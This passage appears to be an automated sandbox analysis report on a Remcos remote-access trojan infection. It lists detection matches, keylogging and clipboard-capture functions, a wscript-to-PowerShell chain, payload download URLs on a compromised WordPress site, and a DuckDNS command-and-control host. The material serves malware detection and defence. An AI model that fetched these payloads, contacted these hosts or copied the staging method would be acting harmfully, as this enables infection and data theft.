                        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 2124, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 6852, type: MEMORYSTR
                        Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 27_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 27_2_00433837
                        Source: powershell.exe, 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_aa6e3a62-5

                        Exploits

                        Source: Yara match, File source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR

                        Privilege Escalation

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004074FD _wcslen,CoGetObject,27_2_004074FD
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49741 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49742 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49744 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49745 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409253
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,27_2_0041C291
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,27_2_0040C34D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409665
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,27_2_0040880C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040783C FindFirstFileW,FindNextFileW,27_2_0040783C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,27_2_00419AF5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,27_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,27_2_0040BD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,27_2_00407C97
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

                        Software Vulnerabilities

                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49733 -> 173.208.241.155:8888
                        Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 15.235.85.194:443 -> 192.168.2.4:49732
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 15.235.85.194:443 -> 192.168.2.4:49732
                        Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 15.235.85.194:443 -> 192.168.2.4:49746
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 15.235.85.194:443 -> 192.168.2.4:49746
                        Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 15.235.85.194:443 -> 192.168.2.4:49743
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 15.235.85.194:443 -> 192.168.2.4:49743
                        Source: Malware configuration extractorURLs: special2023.duckdns.org
                        Source: unknownDNS query: name: comandoespecial2023.duckdns.org
                        Source: Yara matchFile source: 3.2.powershell.exe.29b32a20000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.23a3ac26860.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b993cd6900.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b1a88d8c0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b994479a60.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b1bb69730.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.23a3b3ccdd8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b1a9ee838.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: global trafficTCP traffic: 192.168.2.4:49733 -> 173.208.241.155:8888
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: HP-INTERNET-ASUS HP-INTERNET-ASUS
                        Source: Joe Sandbox ViewASN Name: WIIUS WIIUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49734 -> 178.237.33.50:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 15.235.85.194:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 15.235.85.194:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 15.235.85.194:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 15.235.85.194:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 15.235.85.194:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 15.235.85.194:443
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,27_2_0041B380
                        Source: global trafficDNS traffic detected: DNS query: www.informacionoportuna.com
                        Source: global trafficDNS traffic detected: DNS query: comandoespecial2023.duckdns.org
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1A99C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3AD38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B5B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993DE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B994661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://WWW.INFORMACIONOPORTUNA.COM/WP-CONTENT/UPLOADS/2024/07/REMCOS.TXT
                        Source: powershell.exe, 00000005.00000002.1972234119.0000020FEC49C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                        Source: powershell.exe, 00000005.00000002.1948374011.0000020FEC19B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                        Source: RegSvcs.exeString found in binary or memory: http://geoplugin.net/json.gp
                        Source: powershell.exe, 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BAA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B9943B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://informacionoportuna.com
                        Source: powershell.exe, 00000003.00000002.2423857034.0000029B2A50B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F818B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A371C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A3853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.0000029060DA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F572000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000009.00000002.1826959101.0000029060C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1A491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.00000168936A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.000002905F3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3A861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2859978942.000001311D3F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2087405410.000001EA3F0B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2055308899.000001208E854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2029330543.0000024E81BB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3037888768.00000155ACD3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2182959940.000002102E9A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2106609777.0000016E00088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2165372957.000001C282932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000005.00000002.1800597027.0000020F81458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000009.00000002.1826959101.0000029060C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BAA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B9943B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.informacionoportuna.com
                        Source: powershell.exe, 00000017.00000002.2087405410.000001EA3EFFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1A491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.00000168936A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.000002905F3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3A861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2859978942.000001311D3AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2859978942.000001311D3CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2087405410.000001EA3F00F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2055308899.000001208E7B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2055308899.000001208E79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2029330543.0000024E81B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2029330543.0000024E81B7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3037888768.00000155ACC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3037888768.00000155ACC90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2182959940.000002102E97D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2182959940.000002102E96C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2106609777.0000016E00049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000027.00000002.2106609777.0000016E0005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2165372957.000001C282881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2165372957.000001C282868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000009.00000002.1826959101.0000029060C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1B3E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3AD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993E47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000003.00000002.2423857034.0000029B2A50B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F818B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A371C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A3853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.0000029060DA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F572000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000005.00000002.1800597027.0000020F81458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 00000005.00000002.1800597027.0000020F81458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1A6B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1B3E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3AA8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993E47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B32E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B9943DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B5B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B994661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/07/r
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1A99C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3AD38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B5B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993DE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B994661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/07/remcos.txt
                        Source: powershell.exe, 00000024.00000002.2184970580.000001B993911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1A858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B32E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3ABF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B9943DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txt
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49730 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000027_2_0040A2B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,27_2_0040B70E
